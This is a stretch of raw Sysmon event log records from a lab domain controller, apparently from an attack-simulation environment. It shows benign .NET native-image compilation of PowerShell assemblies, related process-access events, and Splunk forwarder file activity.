23542300x800000000000000022857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.027{4DB9351A-A274-60D3-4905-00000000CF01}4388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Z4X5G0FGGJ\Microsoft.GroupPolicy.Reporting.ni.dll.auxMD5=E2906093077E10B7F5698A77BABAB412,SHA256=6FA35088092D6086DFA8CFC1C40C806A5BA0A2B18319D0DF3876FF731B49C3CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.027{4DB9351A-A274-60D3-4905-00000000CF01}4388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Z4X5G0FGGJ\Microsoft.GroupPolicy.Reporting.ni.dllMD5=F7DD42B3085EE333E0319A10782E4198,SHA256=E707FDCB21C165F4FC8EBC104DBE142873849658E0C20F0126A06C89A32E2AE2,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.918{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5E05-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.886{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5E05-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.886{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5E05-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.886{4DB9351A-A276-60D3-5D05-00000000CF01}4776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EYPQ5ITGUO\Microsoft.PowerShell.Diagnostics.Activities.ni.dll.auxMD5=C603A34248BACD351EFAC0FD9406800A,SHA256=2759FD6C1969823E4F427B276224C7C99F4233F05A86A7B33BFBBACD541115A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.886{4DB9351A-A276-60D3-5D05-00000000CF01}4776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EYPQ5ITGUO\Microsoft.PowerShell.Diagnostics.Activities.ni.dllMD5=860D98D1B177DD5D7303047EDA1CAEC1,SHA256=214EC449F5558CF75634794C704DA13778999F38362A270E19C9CC829B8B6961,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.855{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5D05-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.839{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5D05-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.839{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5D05-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.839{4DB9351A-A276-60D3-5C05-00000000CF01}640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AQJKGD14M0\Microsoft.PowerShell.Core.Activities.ni.dll.auxMD5=0E5D1765DB037C944416873A705234D4,SHA256=2620409E027059F40914B62D77AE2E09DA920B65E6CEABC4DD0740F55F87D018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.839{4DB9351A-A276-60D3-5C05-00000000CF01}640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AQJKGD14M0\Microsoft.PowerShell.Core.Activities.ni.dllMD5=A56FED0137B08BD6535E35D3010FB872,SHA256=D3BE5290AC8148E1C748F8540052DEFC75F3697F97A347DEDC27896982531CFD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.746{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5C05-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.730{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5C05-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.730{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5C05-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microso
ft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.730{4DB9351A-A276-60D3-5B05-00000000CF01}6484NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\XG0GUKB207\Microsoft.PowerShell.ConsoleHost.ni.dll.auxMD5=723DB5D96F5A9211C7DFF508AF6A82DE,SHA256=06DA2E3AAE36E73EF6D4102472CBB1AE612ED11C6C610139EC230236B79518E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.730{4DB9351A-A276-60D3-5B05-00000000CF01}6484NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\XG0GUKB207\Microsoft.PowerShell.ConsoleHost.ni.dllMD5=EDA4DE9BF082A471530275229C19883B,SHA256=F51A2B7BCBC1E68921F27320809E4C711F97C6BBD719DD3B6985D567853EFDA5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.699{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5B05-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.683{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5B05-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.683{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5B05-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.683{4DB9351A-A276-60D3-5A05-00000000CF01}6480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4H4Z51IQOL\Microsoft.PowerShell.Commands.Utility.ni.dll.auxMD5=7AE9589D99555849B8548CDA0FADBFCB,SHA256=1F627E95A112CB9D709B3720AD576C15A79D8903B15CC3DE9201EA613C1378B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.683{4DB9351A-A276-60D3-5A05-00000000CF01}6480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4H4Z51IQOL\Microsoft.PowerShell.Commands.Utility.ni.dllMD5=3181EF5D740D582668B2EAFCCFCDFB84,SHA256=BC756400E98A1D29CA5AFF7BCD672D01F94B94F4B0B128264FBE52EDC2157088,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.511{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69A0C19699145AA56E1A241F8051F74E,SHA256=6CD37DC6F1CAB98F82C6544390A4BACF4D8E7801E8D57AF882DCE3AB048D71C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:02.199{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5A05-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.183{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5A05-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:03.246{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-5F05-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.246{4DB9351A-A276-60D3-5E05-00000000CF01}2036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5IUH5P77WT\Microsoft.PowerShell.Editor.ni.dll.auxMD5=DF79C361296328C2E436C1FE5345B005,SHA256=BA79F3A964BA7ED646B83993CFFB8F86B1162CE30C6A567F25ED846D5CFA9E70,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.246{4DB9351A-A276-60D3-5E05-00000000CF01}2036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5IUH5P77WT\Microsoft.PowerShell.Editor.ni.dllMD5=42462F8A6D0B5FDA951C0E539C7540A8,SHA256=9A88A00AE22D09CB2DF426D3951F40A4FBC9437C2FA144A3D794562A549B5C32,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.027{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=934DB9EC229E4711FC5BA3F786338440,SHA256=4570BF08F3EA15DDD74C529ADA3749F87C80D5929B5522725FC3465CAB2D6332,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.027{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99376E85A17E887632DC6F93DE1E42BC,SHA256=5990CD0193DFADE40B68D52ACD1DF5C80A7C9A5F0A0C81707D52CC9828A84493,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.980{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7405-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 
10341000x800000000000000023095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.980{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7405-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windo